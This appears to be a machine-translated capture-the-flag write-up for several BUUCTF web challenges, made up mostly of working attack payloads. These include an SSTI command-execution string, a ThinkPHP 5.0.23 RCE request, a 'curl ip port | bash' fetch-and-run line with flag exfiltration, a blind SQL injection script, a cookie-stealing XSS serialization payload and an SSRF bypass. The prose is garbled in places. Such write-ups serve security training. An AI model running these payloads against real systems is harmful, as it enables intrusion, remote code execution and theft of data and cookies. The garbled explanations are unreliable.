fakegoogle
SSTI
{{ config.__class__.__init__.__globals__['os'].popen('BJD;cat /flag').read() }}
old-hack
tp5.0.23
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
duangShell
.index.php.swp leak
curl ip: port`tac / flag` or curl ip port | bash
Simple injection
Filter the single quotation marks, select, mid, and, = commonly used characters and the like, the following idea:
by \ username escape single quotes, leading to escapes password
echo different, each blind:
import requests
import string
url='http://ec358d69-8850-46e2-9f03-63fa94c4cb6b.node3.buuoj.cn/index.php'
text=''
for i in range(1,40):
l=28
h=126
while abs(h - l) > 1:
m=(l+h)/2
payload='^ (ascii(substr((password),{},1))>{})#'
data={
'username':'admin\\',
'password':payload.format(i,m)
}
re=requests.post(url,data=data)
#print(re.text)
if 'P3rh4ps' in re.text:
l=m
else:
h=m
mid_num = int((l + h + 1) / 2)
text += chr(int(h))
print(text)
Fake pig sets best in the world
Ethereal has a hint
of time replaced with a time stamp, ua head, then this site quite wide: https://www2.sal.tohoku.ac.jp/~gothit/ua.html
Schrödinger
This is something similar to a blast password, you enter the URL will help you blast, then the higher the success rate of long time, and 100 will be blasting is completed, then the direct blast test.php, and then replace the cookie, the timestamp + Base64
LTMwODU2ODY3Nw ==
result b av station No.
Schrödinger
This is something similar to a blast password, you enter the URL will help you blast, then the higher the success rate of long time, and 100 will be blasting is completed, then the direct blast test.php, and then replace the cookie, the timestamp + base64
xss Light
.git leak
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
hint pop-up cookie, where you can use the native exception of class php
<?php
$a = new Exception("<script>alert(document.cookie)</script>");
//echo serialize($a);
echo urlencode(serialize($a));
Or directly
echo urlencode(serialize("<script>alert(document.cookie)</script>"));
Posted a link:
http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E% 9F% E7% 94% 9F% E7% B1% BB /
elements master
This problem a little brain-dong
import requests
url = 'http://7c60a665-40e4-4641-b6aa-81e151788526.node3.buuoj.cn/{}.php'
s = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar','K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr','Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
text = ''
for i in s:
r = requests.get(url=url.format(i))
if r.status_code != 404:
print(i)
text += r.text
# print(r.text)
print(text)
File detection
home.php index.php ahead discovery
pseudo-protocol file read:
system.php:
<?php
$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';
if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
$url = $_POST['q2'].".y1ng.txt";
$method = $_POST['q3'];
$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";
echo $str1;
if (!preg_match($filter1, $url) ){
die($str2);
}
if (preg_match($filter2, $url)) {
die($str3);
}
if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
die($str4);
}
$detect = @file_get_contents($url, false);
print(sprintf("$url method&content_size:$method%d", $detect));
}
?>
home.php
<?php
setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);
if(isset($_GET['file'])){
if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
die("forbidden");
}
if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
die("not now!");
}
if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
die("You! are! not! my! admin!");
}
if(preg_match("/^home$/i", $_GET['file'])){
die("禁止套娃");
}
else{
if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
$file = $_GET['file'].".php";
}
else{
$file = $_GET['file'].".fxxkyou!";
}
echo "现在访问的是 ".$file . "<br>";
require $file;
}
} else {
echo "<script>location.href='./home.php?file=system'</script>";
}
First admin.php
need ssrf
system.php accepts three parameters:
Ql: futile
q2: url file access, and only at the beginning of http://127.0.0.1/, then spliced on y1ng.txt
Q3: parameter passing mode, only to get or post at the beginning of
last file_get_contents () and then sprint output
q1=w4nder&q2=http://127.0.0.1/admin.php?s=&q3=get %s%
Get admin.php Source:
<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake
function aesEn($data, $key)
{
$method = 'AES-128-CBC';
$iv = md5($_SERVER['REMOTE_ADDR'],true);
return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}
function Check()
{
if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
return true;
else
return false;
}
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
} else {
echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}
$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);
if (isset($_GET['decrypt'])) {
$decr = $_GET['decrypt'];
if (Check()){
$data = $_SESSION['secret'];
include 'flag_2sln2ndln2klnlksnf.php';
$cipher = aesEn($data, 'y1ng');
if ($decr === $cipher){
echo WHAT_YOU_WANT;
} else {
die('爬');
}
} else{
header("Refresh:0.1;url=index.php");
}
} else {
//I heard you can break PHP mt_rand seed
mt_srand(rand(0,9999999));
$length = mt_rand(40,80);
$_SESSION['secret'] = bin2hex(random_bytes($length));
}
?>
Incoming desrypt, need = aesEn ($ _ SESSION [ ' secret'], 'y1ng'), $ _ SESSION [ 'secret'] is randomly generated, initially this comment cheated (// I heard you can break PHP mt_rand seed), that with a pseudo-random number related to, but not random_bytes function really get, then think of this assignment under else, just make sure not to feed else circulation so $ _SESSION [ 'secret'] on = null: the
get: 70klfZeYC + WlC045CcKhtg = =, url encoding